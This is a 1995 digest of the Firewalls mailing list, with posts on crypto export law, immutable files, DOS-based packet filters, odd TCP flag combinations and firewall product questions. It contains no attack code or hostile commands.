Aug 1995 09:58:30 -0800 To: se@adv.sbc.sony.co.jp (Steve England), firewalls@greatcircle.com From: Brent@GreatCircle.COM (Brent Chapman) Subject: Re: Attack, Attack, Attack Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:48 AM 8/11/95, Steve England wrote: >How do the rest of us get to know these ? Whilst i'm not (quite) asking for >"how do i break into site X" i believe there is a lot that can be shared >by the above said people to aid us *newer* people - can we share this >kind of info within this list (Brent ?) otherwise arent all we are doing >is practising another form of security through obscurity ? ie. the few that >know versus the most that dont ? >From the "Policies" section of the "Welcome to the Firewalls mailing list" document (to get a copy of the current document, send the command "info firewalls" in the body of a message to "Majordomo@GreatCircle.COM"): Code for cracking programs (programs designed to help break into another system) should not be posted to the Firewalls mailing list. So, if folks want to talk about _how_ to break in to systems, that's fine; as long as nobody posts code. Now, we could argue over exactly what I mean by "code", but I'd rather not. Use some judgement; if I (or others) disagree with your judgement, believe me, you'll hear about it! :-) One thing to keep in mind regarding this discussion: it's been my experience that the folks who are good at securing systems usually are NOT that good at breaking into them, and vice versa. The two activities require significantly different attitudes and skills in order to be successful. Sure, expert defenders can sometimes use their knowledge of a particular bug or problem to figure out how to exploit that particular bug or problem; they're usually not that good at discovering new bugs or problems, though. And sure, expert attackers can sometimes use their knowledge of a particular bug or problem to figure out how to fix that particular bug or problem; they're usually not very good at generating architectural fixes to address whole classes of problems, though. "Think like a cracker" is an interesting exercise, but it's just that: an exercise. -Brent -- Brent Chapman | Great Circle Associates | For Firewalls Tutorial info: Brent@GreatCircle.COM | 1057 West Dana Street | Tutorial-Info@GreatCircle.COM +1 415 962 0841 | Mountain View, CA 94041 | http://www.greatcircle.com From firewalls-owner Fri Aug 11 11:35:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03533 for firewalls-outgoing; Fri, 11 Aug 1995 10:08:54 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03466 for ; Fri, 11 Aug 1995 10:08:44 -0700 Received: from kgbvax.network.com(129.191.202.58) by miles via smap (V1.3) id sma003331; Fri Aug 11 10:08:07 1995 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id LAA09748; Fri, 11 Aug 1995 11:11:38 -0400 Date: Fri, 11 Aug 1995 11:11:38 -0400 From: Ted Doty Message-Id: <199508111511.LAA09748@kgbvax.network.com> To: MAHAJAN_VIVEK@tandem.com, firewalls@greatcircle.com Subject: Re: Encrypted data across national boundaries??? In-Reply-To: Mail from 'MAHAJAN_VIVEK@tandem.com' dated: 10 Aug 95 17:06:00 +1700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 10 Aug 95 17:06:00 +1700, MAHAJAN_VIVEK@tandem.com wrote: > If there is a need to send data > to about 50 countries (including places such as Russia/China) is there any > kind of encryption solution either hardware or software that can be used > across the board? The data will originate from London for Europe, from > Singapore and Australia for Asia, and from USA for North and South America. As I understand it, The People's Republic of China is now off the "bad guy" list, so you can export crypto to it. Not sure what the banking standard is there, but I'd be kind of surprised if they don't do DES. Note that this still falls under ITAR, so you (probably) need something like RC4 (or NSC's cipher NSC1) for non-banking use. > According to what I have looked into there is no solution that will allow a > standard acceptable encrption method without violating export laws of the > countries from which the data originates. Even if there a standard for > North and South America, a standard for Europe, and a standard for Asia and > Australia that would be acceptable. There doesn't seem to be a single cipher that can be used everywhere (except the short list: Libia, North Korea, etc), EXCEPT for banks. This is mostly the ITAR, but other places (France for sure; rumors have it that Australia also restricts crypto ... can anyone confirm ot deny this?) also have their own restrictions on crypto use ("Damn it ... that's against the First Amendment! It's downright un-american!" ;). The best you can probably do is use a cipher-agile encryption box that has enough variety to be able to satisfy the ITAR and local regulations. -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Fri Aug 11 11:36:26 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04001 for firewalls-outgoing; Fri, 11 Aug 1995 10:18:00 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03958 for ; Fri, 11 Aug 1995 10:17:53 -0700 Received: from gateway.damark.com(204.17.145.230) by miles via smap (V1.3) id sma003938; Fri Aug 11 10:17:12 1995 Received: by gateway.damark.com; id MAA09613; Fri, 11 Aug 1995 12:15:43 -0500 Received: from sco.damark.com(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme009606; Fri, 11 Aug 95 12:15:23 -0500 Received: by damark.com (5.65/1.2-eef) id AA05210; Fri, 11 Aug 95 12:13:40 -0500 Message-Id: <9508111713.AA05210@damark.com> From: "william.wells" To: FIREWALLS Subject: SunOS vs Solaris 2 vs Intel/BSD for firewalls Date: Fri, 11 Aug 95 12:12:00 +6C Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>> Previously written <<< >How do they administer the system in mulituser mode? Presumably adding >users and accounts and such would be disallowed. Also adding undesired >services such as a telnetd or packet grabber would be disallowed. You only set immutable on files you want it on. Devices and special files get default immutability at certain run levels but tagging it on a file is the admin's option. So if you set all the files in /etc/ as immutable then, sure, administering the machine would be complicated. >If I can affect any file that root runs during single user mode, I can >still hack the system, I just have to wait for a re-boot. This is a good point. BUT I'd like you to consider the fact that the immutable files feature has closed off a whole category of well-known weaknesses, and has given the administrator a useful tool to help build more solid systems. It's not too intrusive and it's not too awkward, and it's easy to understand and I suspect that I will find several cases in the next few years where I'll be glad to have it. >>> Newly written <<< This sounds similar to the protection used by another system I used to work on. This system had a protected system master which was not accessed like normal files and was hence, not writable unless you used special commands which worked only from the console . When the system booted, this protected system master was copied (again, into a special "system" file structure, and the copy used. Because the running system was not a normal file system, no normal file commands works; only commands which could be used from the console. By keeping the master (which could be on a read-only media) separate from the running version, rebooting destroyed any changes which systems personnel "threw in" (talk about enforced prevention of "long-term 'temporary'" changes and forced version control). Immutable files seem like the address the same concerns; keeping people from modifying files which they aren't supposed to. Its about time.... (A nice by-product of this was that you could put the system master on tape and boot the tape. Very handy if you lost your system disk.) William Wells Manager, Technical Support Damark International, Inc. normal disclaimers apply From firewalls-owner Fri Aug 11 11:37:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06828 for firewalls-outgoing; Fri, 11 Aug 1995 10:57:01 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06752 for ; Fri, 11 Aug 1995 10:56:48 -0700 Received: from academic.csubak.edu(136.168.1.4) by miles via smap (V1.3) id sma006734; Fri Aug 11 10:56:13 1995 Received: by academic.csubak.edu (MX V4.1 VAX) id 58; Fri, 11 Aug 1995 10:54:15 PST Date: Fri, 11 Aug 1995 10:54:14 PST From: ED RAMON To: firewalls@greatcircle.com Message-ID: <00994B61.42E44F20.58@academic.csubak.edu> Subject: HOw do you get off this list? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can any on give me the exact command to get off of this list? Thanks Ed From firewalls-owner Fri Aug 11 11:38:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05464 for firewalls-outgoing; Fri, 11 Aug 1995 10:39:32 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05383 for ; Fri, 11 Aug 1995 10:39:21 -0700 Received: from di.disclosure.com(205.156.194.1) by miles via smap (V1.3) id sma005340; Fri Aug 11 10:38:28 1995 Received: by Disclosure.COM (4.1/SMI-4.1) id AA12328; Fri, 11 Aug 95 13:40:07 EDT Date: Fri, 11 Aug 1995 13:40:06 -0400 (EDT) From: Scott Barman To: Chris Brenton Cc: firewalls@GreatCircle.COM Subject: Re: DOS Firewall (was Re: Multilevel Security...) In-Reply-To: <9508111136.AA23652@herne.newsedge.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 11 Aug 1995, Chris Brenton wrote: > In reply to: > > > >I don't work have any connection to the company but I have gotten info > >from them for evaluation. The company Network-1 offers the product for > >download for evaluation ( you have to call to get a key to access the > >software) http://www.iu.new/n1/home.html > > The URL you have reached: http://www.iu.new/n1/home.html > is not in service, please check the address and surf again. Gee... and I figured out that if you s/new/net/ you actually may get somewhere! But that takes com... never mind!! :-) scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Fri Aug 11 11:39:52 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05575 for firewalls-outgoing; Fri, 11 Aug 1995 10:40:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05490 for ; Fri, 11 Aug 1995 10:40:24 -0700 Received: from kgbvax.network.com(129.191.202.58) by miles via smap (V1.3) id sma005467; Fri Aug 11 10:40:00 1995 Received: (from ted@localhost) by kgbvax.network.com (8.6.9/8.6.9) id MAA09886; Fri, 11 Aug 1995 12:36:31 -0400 Date: Fri, 11 Aug 1995 12:36:31 -0400 From: Ted Doty Message-Id: <199508111636.MAA09886@kgbvax.network.com> To: padgett@tccslr.dnet.mmc.com, firewalls@greatcircle.com Subject: Re: Encrypted data across national boundaries In-Reply-To: Mail from 'padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)' dated: Fri, 11 Aug 95 09:02:23 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 11 Aug 95 09:02:23 -0400, padgett@tccslr.dnet.mmc.com wrote: Consider PGP. For an American business communicating with a site in France ITAR says that the US company may not send the PGP software to the recipient. (a-1) so they will have to tell the French site to get their own (PGP 2.62i). - am not sure if this would be a violation of (a-iii), I don't get paid for this you know 8*). Actually, if the site in france was a subsidiary (at least 51% US - or presumably Canadian) owned, ITAR would let them send PGP. Whether the French government would let the subsidiary USE it is a different matter. If US company's MIS called the french company's MIS and told them to download PGP (say, from Finland), probably both MIS departments would get an all- expenses vacation in the local prison. The US guys for violation of ITAR, the french for practicing encryption without a license. If the company downloaded the domestic copy from MIT instead of buying it from ViaCrypt, they are in violation of (c-1). Not to mention in violation of patents held by RSA Data Security, Inc. ;-) Bottom line: to be responsible, each area must be checked off (let me know if I missed something) and this just covers the basics - nothing to do with *what* messages are sent. Is not as simple as it looks. Padgett got the meta-issues exactly right. How the laws apply to someone using encryption (legally) in both the sending and receiving countries, but not in the country of transit is a mystery to me. Welcome to the Internet. OBTW, look at the brand new RFCs on Internet standard encryption. RFC #s 1825-1829. -- - Ted -------------------------------------------------------------------------- Ted Doty, Network Systems Corporation | phone: +1 301 596-2270 8965 Guilford Road, Suite 250 | fax: +1 410 381-3320 Columbia, MD, 21046 USA | voice mail: (800) 233-1485 -------------------------------------------------------------------------- The opinion expressed in this message is fictitious. Any resemblence to real opinions, living or dead, is purely coincidental. From firewalls-owner Fri Aug 11 11:40:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06730 for firewalls-outgoing; Fri, 11 Aug 1995 10:55:53 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06698 for ; Fri, 11 Aug 1995 10:55:48 -0700 Received: from proton.llumc.edu(143.197.200.1) by miles via smap (V1.3) id sma006671; Fri Aug 11 10:55:31 1995 Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.6.12/8.6.9) with SMTP id KAA08777; Fri, 11 Aug 1995 10:54:17 -0700 Date: Fri, 11 Aug 1995 10:54:16 -0700 (PDT) From: Michael Baumann To: mdr@vodka.sse.att.com cc: firewalls@greatcircle.com Subject: Re: Multilevel Security is good for firewalls In-Reply-To: <9508111538.AA15922@ig1.att.att.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 11 Aug 1995 mdr@vodka.sse.att.com wrote: > > Michael Baumann writes: > > > > > So your security is toast. Why does everyone keep assuming that > when DOS breaks it dies? There are some things worse than death for > firewalls--like living under the control of an attacker. If the single application dies.. it stops forwarding. This is the point. The important thing to remember is that with DOS, you have but one program running. If your filter is sick, it does not filter. > > > > I can just as easily run B1 unix w/o network daemons if all I want to > > > live w/o proxies. If you proxy in DOS or windows, then the OS has > > > absolutly no protection from software errors. > > Why the *explitive* does everyone assume proxies? > > Not every security policy requires them. > > Even if you don't have proxies, you still have a program of some sort > that is making decisions per packet. If that program goes south of > the border is there any saftey net underneath? Yes.. if that program goes south. It does not forward. > If someone gains control of the program how much damage can they do? Highly, *highly* unlikely. > If it's running on DOS does it boot off a writable hard disk? Burning > ROMs makes a lot of sense here if you stick with this approach, but > there has to be some configuration data that is modifiable somewhere. > Maybe a read-only floppy would be a good place to put it, then you > could do the admin on another box. But once I've broken your > application, I'll just break it again if you reboot. You've got no > means to tell that i've broken it. Drawbridge can be configured in a number of ways. 1) Do not listen to either interface (no external management) and boot from read-only floppy. 2) Listen to the inside only, outside only, both. Encrypted or not. The filter tables are complied.. and can be compiled on any machine you you have a C compiler for. > > The point that I'm trying to make is that a B1 OS gives you one additional > layer of encapsulation. Now for kernel implemented stuff like IP, in > reality higher levels like B3 are better because they require a > modular kernel that can keep track of itself. But B1 does well for > proxies and server daemons, and *ADDS* to the functionality of the > firewall. Now I have a firewall that is safe for proxies, and all of > the other services that an OS provides will come in handy. Granted what you say may true.. But for *most* organizations, that would be major overkill. Just how much will it add to the cost of a machine to get that B1 cert. ? And once you get it.. does it not lose that certification when it is installed somewhere else? Since what I want to do will not exactly be what you want to do, do you not have to certify the machine as configured, and then *ONLY* that certification holds? I seem to recall that thread being mentioned here. If I am wrong, I most humbly apologize. Michael Baumann Electus Technology Inc. / Loma Linda University Medical Center San Bernardino, California. (909)799-8308 |Internet: baumann@llumc.edu From firewalls-owner Fri Aug 11 11:41:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07398 for firewalls-outgoing; Fri, 11 Aug 1995 11:06:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07354 for ; Fri, 11 Aug 1995 11:05:58 -0700 Message-Id: <199508111805.LAA07354@miles.greatcircle.com> Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma007343; Fri Aug 11 11:05:47 1995 Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA269494276; Sat, 12 Aug 1995 04:04:36 +1000 From: Darren Reed Subject: Re: TCP Header Flags To: carsten@group.com (Carsten Schafer) Date: Sat, 12 Aug 1995 04:04:36 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <9508111225.aa03131@rosie.software.group.com> from "Carsten Schafer" at Aug 11, 95 12:25:38 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1047 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Carsten Schafer, sie said: > > I have recently been getting lots of packets with the SYN bit set > and a combination of PUSH, URG and RST. Our packet filter seems > to throw away anything with a SYN bit set. I guess I'm wondering > which packets are considered connection requests by TCP when the packet > contains a SYN bit. Are packets containing the SYN flag and no others > considered connection requests? Most of the packets with the other flags > set seem to be in response to HTTP requests. These don't occur in the normal way of things on the Internet, or at least not as far as I am aware. They are effective because Unix kernels seem to delight in ignoring other bits (URG, PUSH, RST and even some FIN) if the SYN bit is set. This can have some impact for packet filtering... I can't find anything describing what should happen here, nor does it seem to be documented, other than to imply if they're there, ignore them. I asked on the tcp-ip mailling list but no response (must be almost dead now...). darren From firewalls-owner Fri Aug 11 11:42:57 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08600 for firewalls-outgoing; Fri, 11 Aug 1995 11:26:18 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08592 for ; Fri, 11 Aug 1995 11:26:15 -0700 Received: from wet-string.avian.org(199.103.168.126) by miles via smap (V1.3) id sma008589; Fri Aug 11 11:25:34 1995 Received: (from hobbit@localhost) by narq.avian.org (8.6.12/_H*) id NAA12433 for firewalls@greatcircle.com; Fri, 11 Aug 1995 13:25:39 -0400 Date: Fri, 11 Aug 1995 13:25:39 -0400 From: *Hobbit* Message-Id: <199508111725.NAA12433@narq.avian.org> To: firewalls@greatcircle.com Subject: klaxon Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You can also alarm unused ports with tcp_wrapper, which *does* do identd and all the DNS matchup checks and such. I added some mods a while back to make it also log any data received across the trapped connection, which is mucho instructive when someone is trying to rsh/rlogin around your site. Pull down avian.org:/src/fixkits/README for details; look for tw72. _H* From firewalls-owner Fri Aug 11 12:18:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09280 for firewalls-outgoing; Fri, 11 Aug 1995 11:47:24 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09241 for ; Fri, 11 Aug 1995 11:47:17 -0700 Received: from lobster.wellfleet.com(192.32.253.3) by miles via smap (V1.3) id sma009229; Fri Aug 11 11:46:34 1995 Received: from paperboy.wellfleet.com by lobster.wellfleet.com (4.1/SMI-4.1) id AA17519; Fri, 11 Aug 95 14:44:16 EDT Received: from BayNetworks.com by paperboy.wellfleet.com (4.1/SMI-4.1) id AA13807; Fri, 11 Aug 95 14:45:30 EDT From: Post_Office@BayNetworks.com (Post Office) Reply-To: Post_Office@BayNetworks.com To: Firewalls@GreatCircle.COM Subject: NDN: Firewalls-Digest V4 #477 Date: 11 Aug 1995 19:28:56 GMT Message-Id: <471728126.104277200@BayNetworks.com> Organization: Bay Networks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry. Your message could not be delivered to: David Hakaraia (Mailbox or Conference is full.) From firewalls-owner Fri Aug 11 12:31:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11553 for firewalls-outgoing; Fri, 11 Aug 1995 12:28:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11515 for ; Fri, 11 Aug 1995 12:27:59 -0700 Received: from services.more.net(128.206.1.214) by miles via smap (V1.3) id sma011501; Fri Aug 11 12:27:26 1995 Received: by services.more.net (4.1/SMI-4.1) id AA00860; Fri, 11 Aug 95 14:26:22 CDT Date: Fri, 11 Aug 1995 14:26:21 -0500 (CDT) From: "Frank K. Senter" Subject: browserphobia To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I read in Cheswick & Bellovin, and also in a red book that's supposed to help me configure a certain firewall, that pointers in WWW retrieved documents could conceivably contain commands that would subvert the client machine. Obviously I can't expect a firewall to protect against such attacks any more than viral infected ftp downloads. For performance I would prefer to provide a socks server function on the firewall. Has anyone heard of real attempts to use embedded pointers maliciously? What protection do current web browsers provide? From these texts I infer that pointers embedded in html documents are more than simple references to protocol/address/document. Frank Senter Senior Information Specialist Missouri Highway and Transportation Department P.O. Box 270 Jefferson City MO 65102 From firewalls-owner Fri Aug 11 12:56:59 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09734 for firewalls-outgoing; Fri, 11 Aug 1995 11:54:41 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA09718 for ; Fri, 11 Aug 1995 11:54:38 -0700 Received: from noc1.mid.net(198.247.250.15) by miles via smap (V1.3) id sma009711; Fri Aug 11 11:53:54 1995 Received: from gaijin.mid.net (gaijin.mid.net [198.247.250.28]) by noc1.mid.net (8.6.10/8.6.9) with ESMTP id NAA18200 for ; Fri, 11 Aug 1995 13:52:46 -0500 Received: (from alan@localhost) by gaijin.mid.net (8.6.10/8.6.9) id NAA06420 for firewalls@greatcircle.com; Fri, 11 Aug 1995 13:52:36 -0500 From: Alan Hannan Message-Id: <199508111852.NAA06420@gaijin.mid.net> Subject: IPX firewalls To: firewalls@greatcircle.com Date: Fri, 11 Aug 1995 13:52:36 -0500 (CDT) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 538 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What firewalls on the market possess the ability to perform proxy operations for IPX? What firewalls possess the ability to do straight through circuit level filtering of IPX? I realize that a cisco can filter IPX, and I'm curious if there are any commercial products that call themselves "Firewalls" that can do this? -- Alan Hannan Email: alan@mid.net Network Systems Administrator Voice: (402) 472-0239 MIDnet, Lincoln NOC Office Fax: (402) 472-0240 "Even paranoids have enemies" - Kissinger From firewalls-owner Fri Aug 11 13:31:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA12721 for firewalls-outgoing; Fri, 11 Aug 1995 12:44:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA12676 for ; Fri, 11 Aug 1995 12:44:27 -0700 Received: from bwh.harvard.edu(134.174.81.34) by miles via smap (V1.3) id sma012631; Fri Aug 11 12:44:18 1995 Received: from hermes.bwh.harvard.edu (hermes.bwh.harvard.edu [134.174.81.39]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id PAA26799; Fri, 11 Aug 1995 15:43:06 -0400 From: Adam Shostack X-Organization: Brigham & Womens Hospital, A Teaching Affiliate of Harvard Medical School Received: from localhost (adam@localhost) by hermes.bwh.harvard.edu (8.6.4/8.6.4) id PAA14148; Fri, 11 Aug 1995 15:43:39 -0400 Message-Id: <199508111943.PAA14148@hermes.bwh.harvard.edu> Subject: Re: Encrypted data across national boundaries??? To: ted@kgbvax.network.com (Ted Doty) Date: Fri, 11 Aug 1995 15:43:37 -0400 (EDT) Cc: firewalls@greatcircle.com (Firewalls mailing list) In-Reply-To: <199508111511.LAA09748@kgbvax.network.com> from "Ted Doty" at Aug 11, 95 11:11:38 am X-PGP: (New) E794DA91 FD 3C 34 50 FE B4 A0 B8 18 F2 E7 2C A8 2D 29 B8 X-PGP: (Old) 876BD629 70 93 32 D6 36 D4 04 10 40 EC AB 28 A4 1D 0F E2 X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1121 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Whats wrong with using IDEA everywhere? Just don't buy your crypto in the USA; import everything, including the expertise. (Using DES everywhere also works; there are many firms that sell DES based products outside the US. The NSA wants to spread FUD about DES, but probably would not think about suing a large company. Folks like Phil Zimmermann are the prefered target since they don't have legal departments.) Adam Ted Doty writes: | There doesn't seem to be a single cipher that can be used everywhere (except | the short list: Libia, North Korea, etc), EXCEPT for banks. This is mostly | the ITAR, but other places (France for sure; rumors have it that Australia | also restricts crypto ... can anyone confirm ot deny this?) also have their | own restrictions on crypto use ("Damn it ... that's against the First | Amendment! It's downright un-american!" ;). | | The best you can probably do is use a cipher-agile encryption box that has | enough variety to be able to satisfy the ITAR and local regulations. -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Fri Aug 11 13:55:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15244 for firewalls-outgoing; Fri, 11 Aug 1995 13:15:31 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15200 for ; Fri, 11 Aug 1995 13:15:23 -0700 Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma015160; Fri Aug 11 13:15:19 1995 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id PAA00788 for greatcircle.com!firewalls; Fri, 11 Aug 1995 15:07:59 -0500 Received: by ris1.nmti.com (smail2.5) id AA24416; 11 Aug 95 14:09:52 CDT (Fri) Received: by sonic.nmti.com; id AA12508; Fri, 11 Aug 1995 14:34:51 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9508111934.AA12508@sonic.nmti.com.nmti.com> Subject: Re: To OS or 0 2 OS To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Date: Fri, 11 Aug 1995 14:34:51 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: <9508111654.AA16775@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Aug 11, 95 12:54:23 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 561 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Is not broken, it does what it was designed to do very well (well, a "100% > compatable" one will). The BIOS has two major limitations: > 1) slow access > 2) fixed "real" (segmented) addressing I disagree. The BIOS does not do what it was designed to do (provide basic input/output services) at all well. It's not just that it's slow, but it's got basically broken interfaces (for example, it won't address cylinders beyond 1024 on a hard drive), and is missing substantial functionality (it provides less coverage than the CP/M BIOS it was modelled after). From firewalls-owner Fri Aug 11 14:15:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17790 for firewalls-outgoing; Fri, 11 Aug 1995 13:50:20 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17759 for ; Fri, 11 Aug 1995 13:50:14 -0700 Received: from lobster.wellfleet.com(192.32.253.3) by miles via smap (V1.3) id sma017752; Fri Aug 11 13:50:03 1995 Received: from paperboy.wellfleet.com by lobster.wellfleet.com (4.1/SMI-4.1) id AA23101; Fri, 11 Aug 95 16:47:40 EDT Received: from BayNetworks.com by paperboy.wellfleet.com (4.1/SMI-4.1) id AA19608; Fri, 11 Aug 95 16:48:54 EDT From: Post_Office@BayNetworks.com (Post Office) Reply-To: Post_Office@BayNetworks.com To: Firewalls@GreatCircle.COM Subject: NDN: Firewalls-Digest V4 #478 Date: 11 Aug 1995 21:34:55 GMT Message-Id: <471703223.104724046@BayNetworks.com> Organization: Bay Networks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry. Your message could not be delivered to: David Hakaraia (Mailbox or Conference is full.) From firewalls-owner Fri Aug 11 14:30:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16677 for firewalls-outgoing; Fri, 11 Aug 1995 13:34:03 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA16620 for ; Fri, 11 Aug 1995 13:33:52 -0700 From: RROHD1@jcpenney.com Received: from hermes.jcpenney.com(146.235.0.65) by miles via smap (V1.3) id sma016609; Fri Aug 11 13:33:33 1995 Received: from osiris.jcpenney.com by jcpenney.com (5.0/SMI-SVR4) id AA14751; Fri, 11 Aug 1995 15:31:34 -0500 Received: from rrohd1.jcpenney.com ([128.23.31.91]) by osiris.jcpenney.com (5.0/SMI-SVR4) id AA10714; Fri, 11 Aug 1995 15:32:40 -0500 Date: Fri, 11 Aug 1995 15:32:40 -0500 Message-Id: <9508112032.AA10714@osiris.jcpenney.com> To: firewalls@greatcircle.com Subject: Solaris VR4-Basic Security Module Content-Type: text/plain Content-Description: Solaris VR4-Basic Security Module Content-Length: 443 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Robyne Rohde Senior Auditor JCPenney Company, Inc., Dallas, Texas Voice: (214)-431-7128 FAX: (214)-531-7128 InterNet: RROHD1@JCPenney.COM Has anyone implemented the Basic Security Module that is bundled with SVR4? Is it a worthwhile tool to use? Would implementing some of the security within this module be overkill if we are using the logging capabilities within TCP Wrapper, last log, or syslog? Any info would be appreciated........ From firewalls-owner Fri Aug 11 14:35:05 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14646 for firewalls-outgoing; Fri, 11 Aug 1995 13:08:19 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14544 for ; Fri, 11 Aug 1995 13:08:04 -0700 Received: from scylla.sovam.com(192.216.212.97) by miles via smap (V1.3) id sma014524; Fri Aug 11 13:07:30 1995 Received: from thesun.sovam.com by scylla.sovam.com with SMTP id AA27720 (5.67b8s3p1/IDA-1.5); Sat, 12 Aug 1995 00:03:42 +0400 Received: (from iga@localhost) by thesun.sovam.com (8.6.10/8.6.9) id AAA20163; Sat, 12 Aug 1995 00:01:32 +0400 From: "Igor V. Semenyuk" Message-Id: <199508112001.AAA20163@thesun.sovam.com> Subject: Re: Encrypted data across national boundaries??? To: ted@kgbvax.network.com (Ted Doty) Date: Sat, 12 Aug 1995 00:01:30 +0400 (MMTDST) Cc: MAHAJAN_VIVEK@tandem.com, firewalls@greatcircle.com In-Reply-To: <199508111511.LAA09748@kgbvax.network.com> from "Ted Doty" at Aug 11, 95 11:11:38 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 867 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > There doesn't seem to be a single cipher that can be used everywhere (except > the short list: Libia, North Korea, etc), EXCEPT for banks. This is mostly > the ITAR, but other places (France for sure; rumors have it that Australia > also restricts crypto ... can anyone confirm ot deny this?) also have their > own restrictions on crypto use ("Damn it ... that's against the First > Amendment! It's downright un-american!" 